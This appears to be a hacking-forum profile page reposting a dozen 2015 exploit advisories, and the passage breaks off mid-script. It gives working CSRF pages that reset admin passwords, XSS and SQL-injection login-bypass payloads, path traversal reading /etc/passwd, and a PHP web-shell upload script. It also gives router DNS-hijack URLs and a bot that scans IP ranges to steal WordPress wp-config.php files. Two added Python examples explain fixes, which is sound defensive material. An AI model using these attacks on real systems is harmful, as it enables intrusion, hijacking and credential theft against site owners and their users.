HireHackking

Everything posted by HireHackking

  1. # Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe
# Version: 1.3.8
# Tested on: Windows XP SP3 KOR

# Writes a playlist whose only entry is an over-long URL: "http://" followed by 200,000 'A' bytes.
file = "poc.m3u"
data = 'http://' + '\x41' * 200000

fd = open(file, 'w')
fd.write(data)
fd.close()

print("")
print("[*] File successfully created !!")
print("[*] Author : 0neb1n")
print("[*] Mail : barcodecrow(at)gmail(dot)com")
  2. #!/usr/bin/python
# Exploit Title: GoldWave 6.1.2 (URL) Local Crash Exploit
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.goldwave.com/
# Software Link: http://goldwave.com/downloads/InstallGoldWave612.exe
# Version: 6.1.2
# Tested on: Windows 8.1 Home KR

# Step 1 : Make poc.txt and copy "http://AAAAAAAA..."
# Step 2 : run GoldWave 6.1.2 -> File -> Open URL -> Paste "http://AAAAAA..."
# Step 3 : Boom!!

# Writes the over-long URL ("http://" followed by 200,000 'A' bytes) that is pasted into the Open URL dialog.
file = "poc.txt"
data = 'http://' + '\x41' * 200000

fd = open(file, 'w')
fd.write(data)
fd.close()

print("")
print("[*] File successfully created !!")
print("[*] Author : 0neb1n")
print("[*] Mail : barcodecrow(at)gmail(dot)com")
  3. # Exploit Title: CSRF, Persistent XSS & LFI
# Google Dork: intitle: CSRF, Persistent XSS & LFI
# Date: 2015-06-11
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: kilrizzy.github.io/Nakid-CMS
# Software Link: kilrizzy.github.io/Nakid-CMS
# Version: kilrizzy-Nakid-CMS-f274624
# Tested on: windows 7 on XAMPP
# Category: webapps

Vendor:
================================
http://kilrizzy.github.io/Nakid-CMS/

Product:
================================
kilrizzy-Nakid-CMS-f274624

Nakid CMS is an open source content management system built using PHP and CodeIgniter.

Setup mode:
==========
Under root dir for Nakid CMS we set to production mode instead of development in index.php.
e.g. define('ENVIRONMENT', 'production');

Advisory Information:
================================================
CSRF, Persistent XSS & Auth bypass LFI

Vulnerability Details:
=====================

Multiple CSRF(s) exist:
We have ability to do the following as no CSRF tokens are present.

1-Change Admin password
2-Add arbitrary users to system
3-Alter system settings

XSS (persistent):
XSS parameter vulnerabilities exist for the following: payloads will be stored in the MySQL database and activated when a victim visits the vulnerable webpage.

XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
On the "Edit Record" pop up dialog box.

Vulnerable parameters:
---------------------
username
password
email
fname
lname

XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
On the "Edit Record" pop up dialog box.

Vulnerable parameters:
---------------------
from_name
include_path
primary_email
from_email

XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1

Vulnerable parameter:
--------------------
title

Authentication bypass LFI:
Local file inclusion to bypass access controls and read arbitrary files exists by setting the '$url' PHP variable on the following URL:
index.php/connector$url

Exploit POC code(s):
====================

CSRF(s):
========
Condition: Persuade victim to visit our webpage or click our link; if they have a session then we do our CSRF!

1- Add arbitrary user to system
--------------------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
  var e=document.getElementById('ruinurlife')
  e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users" method="post">
<input type="text" name="username" value="sum1" />
<input type="text" name="password" value="abc123" />
<input type="text" name="email" value="X@X.com"/>
<input type="text" name="fname" value="sum"/>
<input type="text" name="lname" value="1"/>
<input type="text" name="oper" value="add"/>
<input type="text" name="id" value="_empty"/>
</form>
</body>
</html>

2-Change Admin password
------------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
  var e=document.getElementById('ruinurlife')
  e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile" method="post">
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="xyz123" />
<input type="text" name="email" value="hell@abyss.com"/>
<input type="text" name="fname" value="hyp3r"/>
<input type="text" name="lname" value="linx"/>
<input type="text" name="action" value="edit_profile"/>
<input type="text" name="submitbt" value="Save"/>
</form>
</body>
</html>

3-Alter system settings
-----------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
  var e=document.getElementById('ruinurlife')
  e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings" method="post">
<input type="text" name="value" value="HELL@ABYSS.com" />
<input type="text" name="oper" value="edit" />
<input type="text" name="id" value="1"/>
</form>
</body>
</html>

XSS persistent POC code:
=======================
Inject <script>alert(666)</script> into any of the vulnerable fields described above using the POST method.
Need to highlight a row then click the edit dialog box to edit settings.

e.g.
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings

from_name <------- <script>alert(666)</script>
include_path
primary_email
from_email

Authorization bypass LFI:
========================
1- Logout, create a hell.txt file or whatever and put it in 'htdocs' or the web root, then visit the URL (change to suit your environment).

2- http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt

OR try

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php

Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 11, 2015 : Public Disclosure

Severity Level:
=========================================================
High

Description:
==========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] kilrizzy-Nakid-CMS-f274624
Vulnerable Parameter(s): [+] username password email fname lname from_name include_path primary_email from_email title connector$url
Affected Area(s): [+] /system/users /system/profile /system/content_edit/
===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
  4. # Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7

# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version.

1. Stored XSS through a malicious check plugin

a. Create a plugin with the following content:

#!/bin/bash
echo '<script>alert("script0t0s")</script>'
exit 2

b. create a new check and assign this plugin.
c. once a host uses this check, navigate to the event page; the XSS will be injected.
d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior to his acknowledgement.

2. Stored XSS in host profile

a. add a host
b. in the description of the host, add a description like the one below:
<script>alert(document.cookie)</script>
c. save settings
d. once a user/admin views the host settings, XSS will be injected.

3. Reflected XSS in Test service check page.

a. Add a new service check
b. Test the new service check against any host and provide in the command line the following:
<script>alert("test")</script>
c. the XSS will immediately reflect to the screen.

response output:

POST /state/service/166/exec HTTP/1.1
Host: 192.168.0.20
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
Content-Length: 105
Cookie: PHPSESSID= auth_tkt=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
  5. # Exploit Title: SQL Injection & Persistent XSS
# Google Dork: intitle: SQL Injection & Persistent XSS
# Date: 2015-06-12
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: zencherry.com
# Software Link: sourceforge.net/projects/zencherrycms
# Version: 1.1
# Tested on: windows 7 on Apache Tomcat
# Category: webapps

Vendor:
=============================================
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms

Product:
==================================================
ZCMS 1.1
JavaServer Pages Content Management System

Advisory Information:
==============================
SQL Injection & Persistent XSS

Vulnerability Details:
======================

SQL Injection (CVE-2015-7346):
Login to admin area requires a password but is easily bypassed using the classic SQL injection method because the application uses concatenated user input to construct SQL queries.

ZCMS exploitable admin login code:
==================================
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users WHERE status = 0 AND username = '"+username+"' AND password = '"+request.getParameter("pass") +"' AND type = 1 ;";

So we just supply an Admin password like ---> HELL' OR '2'='2
which will resolve as true!

SQL Inject XSS Payload:
=======================
We can also inject a persistent XSS payload directly into the MySQL database, subverting all character filtering, by leveraging the existing SQL injection vulnerabilities.

Persistent XSS (CVE-2015-7347):
===============
Another persistent XSS vector is here in the author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]

Exploit code(s):
===============

1) Bypass admin login
---------------------
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field

2) Inject XSS using SQL Injection
---------------------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title="<script>alert(1)</script>&content=<script>alert(1)</script>&author=<script>alert(1)</script>SATAN&visibility=1&type=1&comm=0

3) Persistent XSS field
-----------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]
Inject <script>alert(666)</script> in the author input field.

Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 12, 2015 : Public Disclosure

Severity Level:
=========================================================
High

Description:
==========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] ZCMS_1.1
Vulnerable Parameter(s): [+] pass, title, content, author
Affected Area(s): [+] Admin, CMS
===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
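To show exactly why HELL' OR '2'='2 gets past the login query quoted in the post above, here is an added Python example (editor's code, not ZCMS's): the advisory's Java concatenation is transcribed line for line, run against an in-memory SQLite table with one constructed admin row, and placed next to the parameterised query that closes the hole. TABLE_PREFIX, the table columns beyond those the query names, and the sample password are assumptions for the demonstration.

```python
import sqlite3

TABLE_PREFIX = "zc_"  # assumed; the advisory does not give ZCMS's real TABLE_PREFIX value


def make_db():
    """Constructed sample data: one enabled (status 0) administrator (type 1)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f"CREATE TABLE {TABLE_PREFIX}users "
        "(username TEXT, password TEXT, status INTEGER, type INTEGER)"
    )
    conn.execute(
        f"INSERT INTO {TABLE_PREFIX}users VALUES ('admin', 'correct-horse-battery', 0, 1)"
    )
    return conn


def vulnerable_usercount(conn, username, password):
    """The ZCMS login check transcribed from the advisory's Java: raw input is spliced
    into the SQL text, so a quote character in the password becomes SQL syntax."""
    squerry = (
        "SELECT COUNT(username) AS usercount FROM " + TABLE_PREFIX + "users"
        " WHERE status = 0 AND username = '" + username + "'"
        " AND password = '" + password + "' AND type = 1 ;"
    )
    return conn.execute(squerry).fetchone()[0]


def safe_usercount(conn, username, password):
    """Parameterised form: the driver binds the values, so the quote in the payload is
    compared as data and never reaches the SQL parser."""
    sql = (
        f"SELECT COUNT(username) AS usercount FROM {TABLE_PREFIX}users"
        " WHERE status = 0 AND username = ? AND password = ? AND type = 1"
    )
    return conn.execute(sql, (username, password)).fetchone()[0]


def demo():
    conn = make_db()
    payload = "HELL' OR '2'='2"
    # With the payload the WHERE clause reads
    #   ... AND password = 'HELL' OR '2'='2' AND type = 1
    # AND binds tighter than OR, so the right-hand side is true for every type = 1 row
    # and the count is non-zero whatever the username or password was.
    return {
        "vuln_wrong_password": vulnerable_usercount(conn, "admin", "wrong"),
        "vuln_injected": vulnerable_usercount(conn, "admin", payload),
        "vuln_injected_unknown_user": vulnerable_usercount(conn, "nobody", payload),
        "safe_injected": safe_usercount(conn, "admin", payload),
        "safe_real_password": safe_usercount(conn, "admin", "correct-horse-battery"),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name}: usercount = {count}")
```

The same bind-parameter fix applies to the JSP original (a PreparedStatement with ? placeholders); the point the example makes is that escaping or filtering characters is not what closes the hole, separating code from data is.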
  6. Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/

Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.

Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path; it only attempts to check if the path is in /wp-content/uploads, which is easily defeated with ../. This vulnerability doesn’t require authentication to the Wordpress site.

File ./se-html5-album-audio-player/download_audio.php:

$file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
$is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
// make sure it's a file before doing anything!
if( is_file($file_name) && $is_in_uploads_dir !== false ) {

    // required for IE
    if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }

    // get the file mime type using the file extension
    switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
        case 'pdf': $mime = 'application/pdf'; break;
        case 'zip': $mime = 'application/zip'; break;
        case 'jpeg':
        case 'jpg': $mime = 'image/jpg'; break;
        default: $mime = 'application/force-download';
    }
    header('Pragma: public'); // required
    header('Expires: 0'); // no cache
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
    header('Cache-Control: private',false);
    header('Content-Type: '.$mime);
    header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: '.filesize($file_name)); // provide file size
    header('Connection: close');
    readfile($file_name); // push it out
    exit();
}

The above code does not verify if a user is logged in, nor does it do proper sanity checking of whether the file is outside of the uploads directory.

CVEID: 2015-4414
OSVDB:

Exploit Code:

$ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
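The strpos() check in download_audio.php only asks whether the string '/wp-content/uploads/' occurs somewhere in the concatenated path, so a value that starts inside uploads and then climbs out with ../ passes it. The added Python example below (editor's code, not the plugin's) reproduces that check, puts a canonicalising check beside it, and runs both against a constructed temporary directory tree; the directory layout, file names and file contents are invented for the demonstration. The hardened check is a general one: realpath() collapses '..' and resolves symlinks, after which a prefix comparison against the canonical uploads directory is decisive.

```python
import os
import tempfile

UPLOADS_MARKER = "/wp-content/uploads/"


def vulnerable_resolve(document_root, requested):
    """Mirrors download_audio.php: $_SERVER['DOCUMENT_ROOT'] . $_GET['file'], then a
    substring search for the uploads marker. '../' after the marker walks out of it."""
    file_name = document_root + requested
    is_in_uploads_dir = file_name.find(UPLOADS_MARKER) != -1  # strpos(...) !== false
    if os.path.isfile(file_name) and is_in_uploads_dir:
        return file_name
    return None


def hardened_resolve(document_root, requested):
    """Added hardening (not the plugin's code): canonicalise both the uploads directory
    and the requested path, then require the request to sit strictly inside uploads."""
    uploads_dir = os.path.realpath(os.path.join(document_root, "wp-content", "uploads"))
    candidate = os.path.realpath(os.path.join(document_root, requested.lstrip("/")))
    if os.path.commonpath([uploads_dir, candidate]) != uploads_dir:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Constructed layout: <tmp>/docroot/wp-content/uploads/song.mp3 plus a file outside
    the web root, <tmp>/secret.txt, standing in for /etc/passwd."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "docroot")
        uploads = os.path.join(docroot, "wp-content", "uploads")
        os.makedirs(uploads)
        with open(os.path.join(uploads, "song.mp3"), "w") as f:
            f.write("not really audio\n")
        with open(os.path.join(tmp, "secret.txt"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")

        legit = "/wp-content/uploads/song.mp3"
        # Three '..' climb out of uploads/, wp-content/ and docroot/. The advisory's curl
        # uses more; surplus '..' at the filesystem root cost the attacker nothing.
        evil = "/wp-content/uploads/../../../secret.txt"
        return {
            "vulnerable_serves_legit": vulnerable_resolve(docroot, legit) is not None,
            "vulnerable_serves_secret": vulnerable_resolve(docroot, evil) is not None,
            "hardened_serves_legit": hardened_resolve(docroot, legit) is not None,
            "hardened_serves_secret": hardened_resolve(docroot, evil) is not None,
        }


if __name__ == "__main__":
    for name, served in demo().items():
        print(f"{name}: {served}")
```

The check does nothing about the other defect the post names, the missing login requirement; that needs an authentication check before the path logic runs, not a better path check.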
  7. Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org

Description:
A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.

Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php, as an unauthenticated user can upload any file to the system, including a .php file. The upload.php doesn't check that the user is authenticated, and a simple POST will allow arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:

<?php

$filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
if (file_exists($filename)) {
    include_once($filename);
} else {
    include_once("../../../../wp-load.php");
}
echo "Here";
$image_file = $_FILES['gf_aviary_file'];
if($image_file['name']!=''){
    $max_file_size = 4*1024*1024;
    $file_size = intval($image_file['size']);
    if( $file_size > $max_file_size ){
        $msg = "File Size is too big.";
        $error_flag = true;
    }
    $extension = strtolower(end(explode('.', $image_file['name'])));
    $aa_options = get_option('gf_aa_options');
    $supported_files = $aa_options['supported_file_format'];
    $supported_files = strtolower($supported_files);
    if(!$error_flag && $supported_files != '' ){
        $supported_files = explode (',', $supported_files);
        if(!in_array($extension, $supported_files)){
            $msg = "No Supported file.";
            $error_flag = true;
        }
    }
    if(!$error_flag){
        $wp_upload_dir = wp_upload_dir();
        if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
            mkdir($wp_upload_dir['basedir'].'/gform_aviary');
        }
        $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
        $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
        $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        if(move_uploaded_file($image_file['tmp_name'], $file_name)){
            $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        }
    }
    $return_obj = array('status' => 'success', 'message' => $file_url);
    echo json_encode($return_obj);
}
?>

CVEID: 2015-4455
OSVDB:

Exploit Code:

<?php
/* Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/* Larry W. Cashdollar @_larry0 6/7/2015
   shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php */

$target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";

// CURLFile replaces the older '@/path' upload syntax, which PHP 7 no longer honours.
// No gf_aviary_field_id is sent, so the file lands as gform_aviary/_shell.php.
$post = array('name' => 'shell.php', 'gf_aviary_file' => new CURLFile($file_name_with_full_path));

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);

echo "<hr>";
echo $result;
echo "<hr>";
?>
  8. D-Link DSL-2730B AU_2.01 Authentication Bypass DNS Change

Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg

Disclaimer:
This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk!

This security hole allows an attacker to bypass authentication and change the DNS. When the administrator is logged in the web management interface, an attacker may be able to completely bypass authentication phase and connect to the web management interface with administrator's credentials. This attack can also be performed by an external attacker who connects to the router's public IP address, if remote management is enabled.

To change the DNS without logging into web management interface use the following URL:

http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
  9. <!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
    var divA = document.createElement("div");
    document.body.appendChild(divA);
    try {
        //divA.contentEditable = "true";
        divA.outerHTML = "AAAA";
        var context = divA['msGetInputContext']();
    } catch (exception) { }
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->
  10. D-Link DSL-526B ADSL2+ AU_2.01 Unauthenticated Remote DNS Change

Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg

No description for morons, script kiddies & noobs !!

Disclaimer:
This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk!

[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"
var dns2 = '8.8.8.8';
  11. # Exploit Title: wp-imagezoom Remote Image Upload
# Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id="
# Date: 06.06.2015
# Exploit Author: T3N38R15
# Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip
# Version: 1.1.0
# Tested on: Windows (Firefox) Linux (Firefox)

The affected file is div_img.php; it allows anybody to upload jpg files.

/wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100

would upload the file to the default directory:

/wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/

The first one is then your picture (it is only 469x469; the rest is cut out); the others are zoomed/cut versions of it.

It also supports an FPD:

http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=

The variable org_img has the value of the current location of the work directory.

We can also delete entries with

http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=

The following options are available for the cmd parameter:

http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image

Proof of concept:

http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100

Greets to Team Madleets/leets.pro & VIRkid ;)

Regards
T3N38R15
  12. =========================================================
[+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability
[+] Date :- 5 - June - 2015
[+] Vendor Homepage: :- http://main.pasworld.co.th/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php site:go.th inurl:"detail.php?id="
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha
[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- detail.php?id=
[+] Affected Area(s) :- Entire admin, database, Server
=========================================================
[+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter
[+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php
[+] POC :- http://127.0.0.1/detail.php?id=[SQL]'

SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs
++++++++++++++++++++++++++

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=152 AND 1414=1414

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982#
=========================================================
  13. ######################################################################################
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability                #
# Date: june 6, 2015                                                                    #
# Exploit Author: ViRuS OS                                                              #
# Google Dork: inurl:?fdx_switcher=mobile                                               #
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/                     #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip     #
# Version: WP Mobile Edition Version 2.2.7                                              #
# Tested on : windows                                                                   #
######################################################################################

Description :
Wordpress Plugin 'WP Mobile Edition' is not filtering data, so we can get the configuration file in the path
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php >

# Exploit Code :

<?php
//ViRuS OS
set_time_limit(0);
error_reporting(0);

echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n";
print " Coded By
__     ___                  ___  ____
\ \   / (_)_ __ _   _ ___  / _ \/ ___|
 \ V /| | '__| | | / __| | | | \___ \
  \_/ |_|_|  \__,_|___/   \___/|___/

Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Welcome Master ViRuS OS ################\n\n";

echo "Server Target IP : ";
$ip = trim(fgets(STDIN, 1024));
$ip = explode('.', $ip);
$ip = $ip[0].'.'.$ip[1].'.'.$ip[2];   // first three octets; the last octet is iterated below

for ($i = 0; $i <= 255; $i++) {
    // Bing "ip:" search returns hosts served from this address that mention wordpress
    $sites = array_map("site", bing("ip:$ip.$i wordpress"));
    $un = array_unique($sites);
    echo "[+] Scanning -> ", $ip.'.'.$i, "\n";
    echo "Found : ".count($sites)." sites\n\n";
    foreach ($un as $pok) {
        $bda = "http://$pok";
        $linkof = '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php';
        $dn = $bda.$linkof;
        $file = @file_get_contents($dn);
